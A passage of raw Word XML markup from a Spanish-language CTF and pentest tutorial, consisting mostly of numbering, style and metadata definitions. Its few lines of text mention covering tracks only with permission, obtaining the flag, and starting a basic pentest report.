        <w:t>Cubres tus huellas</w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:t xml:space="preserve"> (solo con permiso y según el contrato)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643786B0" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00ED2427">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>En este CTF:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413705D3" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00ED2427">
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ya completaste tu objetivo principal:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:t xml:space="preserve"> Obtuviste la bandera</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E73B1A" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00ED2427">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ejercicio: Crear un Informe Básico</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD35147" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRDefault="00ED2427" w:rsidP="00ED2427">
      <w:r w:rsidRPr="00A86A33">
        <w:t>En un pentest real, escribirías un informe detallado. Aquí está una plantilla básica:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C94EA5" w14:textId="77777777" w:rsidR="0010195B" w:rsidRPr="00A86A33" w:rsidRDefault="0010195B" w:rsidP="00ED2427"/>
    <w:sectPr w:rsidR="0010195B" w:rsidRPr="00A86A33" w:rsidSect="005342F0">
      <w:pgSz w:w="12240" w:h="15840"/>
      <w:pgMar w:top="1417" w:right="900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3978"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E872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33831"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CB20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64922"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C9BC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B4725"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0E1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F70A5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5F90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75AE4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="34AC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87BEA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="069E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565D31"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DA9E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6752"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F15A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4655E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0EC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95D0B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6A3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B78D9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BF64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B70"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="12D8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05953"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FC38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36C98"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="985C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24098"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="82D4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31129"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0746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353A5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="35C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B7153"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A7E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86833"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="727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B4118"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="09CA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B74CE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="944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A108A4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4954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86E4B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="209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804A1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8278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7E61C4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AD1A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9311F7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E39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7A45B2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="176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81581"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="628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197D86"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A9B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309D5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CCE8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D433A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BDF01B36"/>
    <w:lvl w:ilvl="0" w:tplc="64C4108A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4CBE6951"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="44FA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3770BB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFA4BBF4"/>
    <w:lvl w:ilvl="0" w:tplc="B268BE5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511C73FB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6590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B711A9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8D7AEAA8"/>
    <w:lvl w:ilvl="0" w:tplc="B268BE5C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6" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="56194E1F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="75D6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F11242"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="51E6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812F21"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8A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B1696"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="46BE734E"/>
    <w:lvl w:ilvl="0" w:tplc="B268BE5C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0" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="58B31ED6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4E0A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1D02E7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="100A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8916BC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C6901B9E"/>
    <w:lvl w:ilvl="0" w:tplc="05F001EC">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1428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621A4976"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A1DCF1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3E0E84"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="231A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DF144E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="365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4964B5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="726C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7E31F6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B52C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B62B04"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FE48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9A5A9D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="ED86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A1D09"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1026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6A0012"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DCF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FC6D6F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2082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D03A66"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1BA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2D27D0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="058C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0274C5C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="34F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6D43C0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A7D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EE2FF0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7170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057709"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B2C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FB5635"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D448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5A0241"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6CCE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AC4A14"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="348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DCE14B4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DB0E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FC656C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6C0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FD0A18"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EFD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BD4404"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FCC8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21323">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1239173568">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1446995731">
    <w:abstractNumId w:val="65"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1571696946">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1535462194">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="298996185">
    <w:abstractNumId w:val="58"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1279483002">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="548226872">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1241672213">
    <w:abstractNumId w:val="54"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="2053654439">
    <w:abstractNumId w:val="47"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="90905632">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="208734955">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="844973717">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1195381674">
    <w:abstractNumId w:val="60"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="1121609237">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="1069037647">
    <w:abstractNumId w:val="44"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="1322392781">
    <w:abstractNumId w:val="43"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="745881280">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="1004479082">
    <w:abstractNumId w:val="61"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="558054745">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="242110655">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="1220819385">
    <w:abstractNumId w:val="45"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="632175504">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="1036856862">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="1614550492">
    <w:abstractNumId w:val="56"/>
  </w:num>
  <w:num w:numId="26" w16cid:durableId="983899596">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="27" w16cid:durableId="8603741">
    <w:abstractNumId w:val="39"/>
  </w:num>
  <w:num w:numId="28" w16cid:durableId="1077937854">
    <w:abstractNumId w:val="42"/>
  </w:num>
  <w:num w:numId="29" w16cid:durableId="833107576">
    <w:abstractNumId w:val="33"/>
  </w:num>
  <w:num w:numId="30" w16cid:durableId="644774751">
    <w:abstractNumId w:val="35"/>
  </w:num>
  <w:num w:numId="31" w16cid:durableId="18705705">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="32" w16cid:durableId="1296913475">
    <w:abstractNumId w:val="62"/>
  </w:num>
  <w:num w:numId="33" w16cid:durableId="1043601595">
    <w:abstractNumId w:val="34"/>
  </w:num>
  <w:num w:numId="34" w16cid:durableId="930897951">
    <w:abstractNumId w:val="57"/>
  </w:num>
  <w:num w:numId="35" w16cid:durableId="1335037097">
    <w:abstractNumId w:val="36"/>
  </w:num>
  <w:num w:numId="36" w16cid:durableId="2029332575">
    <w:abstractNumId w:val="40"/>
  </w:num>
  <w:num w:numId="37" w16cid:durableId="1248466876">
    <w:abstractNumId w:val="64"/>
  </w:num>
  <w:num w:numId="38" w16cid:durableId="2071923877">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="39" w16cid:durableId="1145512837">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="40" w16cid:durableId="963804732">
    <w:abstractNumId w:val="49"/>
  </w:num>
  <w:num w:numId="41" w16cid:durableId="153297539">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="42" w16cid:durableId="337659492">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="43" w16cid:durableId="1363283378">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="44" w16cid:durableId="792674220">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="45" w16cid:durableId="2079278550">
    <w:abstractNumId w:val="52"/>
  </w:num>
  <w:num w:numId="46" w16cid:durableId="1343362652">
    <w:abstractNumId w:val="50"/>
  </w:num>
  <w:num w:numId="47" w16cid:durableId="1254819796">
    <w:abstractNumId w:val="63"/>
  </w:num>
  <w:num w:numId="48" w16cid:durableId="383258203">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="49" w16cid:durableId="1375038019">
    <w:abstractNumId w:val="46"/>
  </w:num>
  <w:num w:numId="50" w16cid:durableId="341203179">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="51" w16cid:durableId="1723409616">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="52" w16cid:durableId="959385154">
    <w:abstractNumId w:val="48"/>
  </w:num>
  <w:num w:numId="53" w16cid:durableId="2015036291">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="54" w16cid:durableId="1573008011">
    <w:abstractNumId w:val="51"/>
  </w:num>
  <w:num w:numId="55" w16cid:durableId="1307514229">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="56" w16cid:durableId="6643020">
    <w:abstractNumId w:val="55"/>
  </w:num>
  <w:num w:numId="57" w16cid:durableId="1042940153">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="58" w16cid:durableId="1230069506">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="59" w16cid:durableId="2040663089">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="60" w16cid:durableId="803541805">
    <w:abstractNumId w:val="37"/>
  </w:num>
  <w:num w:numId="61" w16cid:durableId="1617055248">
    <w:abstractNumId w:val="38"/>
  </w:num>
  <w:num w:numId="62" w16cid:durableId="511918048">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="63" w16cid:durableId="1741630638">
    <w:abstractNumId w:val="59"/>
  </w:num>
  <w:num w:numId="64" w16cid:durableId="1445080589">
    <w:abstractNumId w:val="53"/>
  </w:num>
  <w:num w:numId="65" w16cid:durableId="953823130">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="66" w16cid:durableId="36398918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C6"/>
    <w:rsid w:val="0006635F"/>
    <w:rsid w:val="001004E3"/>
    <w:rsid w:val="0010195B"/>
    <w:rsid w:val="0012524F"/>
    <w:rsid w:val="001275E2"/>
    <w:rsid w:val="00180225"/>
    <w:rsid w:val="0019767C"/>
    <w:rsid w:val="001D2361"/>
    <w:rsid w:val="0020428B"/>
    <w:rsid w:val="00231E7B"/>
    <w:rsid w:val="00392BF8"/>
    <w:rsid w:val="003A4936"/>
    <w:rsid w:val="003B68E6"/>
    <w:rsid w:val="003D40AB"/>
    <w:rsid w:val="004125AD"/>
    <w:rsid w:val="00433E8C"/>
    <w:rsid w:val="0045334F"/>
    <w:rsid w:val="004812B6"/>
    <w:rsid w:val="004B7F2E"/>
    <w:rsid w:val="004E0F3F"/>
    <w:rsid w:val="00525B93"/>
    <w:rsid w:val="00532777"/>
    <w:rsid w:val="005342F0"/>
    <w:rsid w:val="005A0157"/>
    <w:rsid w:val="005A4FCB"/>
    <w:rsid w:val="005C65DF"/>
    <w:rsid w:val="005F025F"/>
    <w:rsid w:val="0061535E"/>
    <w:rsid w:val="00645F91"/>
    <w:rsid w:val="0067140C"/>
    <w:rsid w:val="006867C4"/>
    <w:rsid w:val="00691FC6"/>
    <w:rsid w:val="006B2386"/>
    <w:rsid w:val="006B5D28"/>
    <w:rsid w:val="006C0703"/>
    <w:rsid w:val="006C6DDC"/>
    <w:rsid w:val="00744CEA"/>
    <w:rsid w:val="0075727B"/>
    <w:rsid w:val="00767DBB"/>
    <w:rsid w:val="007B0DA2"/>
    <w:rsid w:val="007D3492"/>
    <w:rsid w:val="008352EB"/>
    <w:rsid w:val="00850BD7"/>
    <w:rsid w:val="00863C1E"/>
    <w:rsid w:val="008B3FED"/>
    <w:rsid w:val="008E3412"/>
    <w:rsid w:val="008F15DC"/>
    <w:rsid w:val="00904006"/>
    <w:rsid w:val="00950546"/>
    <w:rsid w:val="009717D4"/>
    <w:rsid w:val="00972643"/>
    <w:rsid w:val="00984733"/>
    <w:rsid w:val="009C4911"/>
    <w:rsid w:val="009F5F69"/>
    <w:rsid w:val="009F63A2"/>
    <w:rsid w:val="00A60CA3"/>
    <w:rsid w:val="00A70AA9"/>
    <w:rsid w:val="00A86A33"/>
    <w:rsid w:val="00AB3B38"/>
    <w:rsid w:val="00B10AF9"/>
    <w:rsid w:val="00B15D64"/>
    <w:rsid w:val="00B209B6"/>
    <w:rsid w:val="00B23CF0"/>
    <w:rsid w:val="00B412A6"/>
    <w:rsid w:val="00B82B3F"/>
    <w:rsid w:val="00B8326D"/>
    <w:rsid w:val="00B86E85"/>
    <w:rsid w:val="00C4567A"/>
    <w:rsid w:val="00C6074F"/>
    <w:rsid w:val="00C75B1C"/>
    <w:rsid w:val="00C9787E"/>
    <w:rsid w:val="00CC431B"/>
    <w:rsid w:val="00D23D55"/>
    <w:rsid w:val="00D55935"/>
    <w:rsid w:val="00D55B47"/>
    <w:rsid w:val="00D575E7"/>
    <w:rsid w:val="00D852AF"/>
    <w:rsid w:val="00E066E8"/>
    <w:rsid w:val="00E27B16"/>
    <w:rsid w:val="00E56E1E"/>
    <w:rsid w:val="00ED2427"/>
    <w:rsid w:val="00F84CB4"/>
    <w:rsid w:val="00FE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41306"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{A53325B7-01A5-4506-BAC4-AB4A462E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F9"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Ttulo1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Ttulo1Car"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="0069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1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1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1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1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1F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1F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1F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1F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1F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1F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1F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1F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1F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1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1F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1FC6"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="Tablaconcuadrcula4-nfasis2">
    <w:name w:val="Grid Table 4 Accent 2"/>
    <w:basedOn w:val="Tablanormal"/>
    <w:uiPriority w:val="49"/>
    <w:rsid w:val="00D575E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19</Pages>
  <Words>2844</Words>
  <Characters>16327</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>563</Lines>
  <Paragraphs>547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 Contreras Rodriguez</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Antonio  Contreras Rodriguez</cp:lastModifiedBy>
  <cp:revision>11</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-10-29T10:52:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-10-30T06:04:00Z</dcterms:modified>
</cp:coreProperties>
</file>